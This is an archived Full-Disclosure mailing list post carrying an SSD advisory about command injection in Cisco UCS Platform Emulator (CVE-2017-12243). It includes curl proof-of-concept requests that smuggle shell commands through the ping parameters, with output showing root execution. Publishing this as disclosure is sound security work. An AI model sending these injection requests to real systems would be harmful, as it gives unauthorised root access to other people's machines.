lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 1 Nov 2017 08:15:19 +0200
From: Maor Shwartz <maors@...ondsecurity.com>
To: fulldisclosure@...lists.org
Cc: SecuriTeam Secure Disclosure <ssd@...ondsecurity.com>
Subject: [FD] SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

Full report: https://blogs.securiteam.com/index.php/archives/3362
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD


Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities
found in Cisco UCS Platform Emulator version 3.1(2ePE1).

Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled
into a virtual machine (VM). The VM includes software that emulates
hardware communications for the Cisco Unified Computing System (Cisco UCS)
hardware that is configured and managed by Cisco UCS Manager. For example,
you can use Cisco UCS Platform Emulator to create and test a supported
Cisco UCS configuration, or to duplicate an existing Cisco UCS environment
for troubleshooting or development purposes.

The vulnerabilities found in Cisco UCS Platform Emulator are:

Unauthenticated remote code execution
Authenticated remote code execution

Credit
An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
The vendor has released patches to address this vulnerability and issue the
following CVE:

CVE-2017-12243

Vulnerabilities details
Unauthenticated remote code execution
User controlled input is not sufficiently sanitized when passed to
IP/settings/ping function. An unauthenticated attacker can inject commands
via PING_NUM and PING_IP_ADDR parameters. Those commands will run as root
on the remote machine.

Proof of Concept

===

curl "
http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"

curl -k "
https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"

curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"

curl -k "
https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1"

===

By sending one of the above requests the Cisco UCS will response with:

===

/sample output/

================

demo@...i:~/poc$ curl -k "
http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms


--- 127.0.0.1 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms

Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686
i686 i386 GNU/Linux


demo@...i:~/poc$ curl "
http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"

uid=0(root) gid=0(root) groups=0(root)

===




--
Thanks
Maor Shwartz
Beyond Security
GPG Key ID: 93CC36E2DE7FF514

Download attachment "SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution – SecuriTeam Blogs.pdf" of type "application/pdf" (133308 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ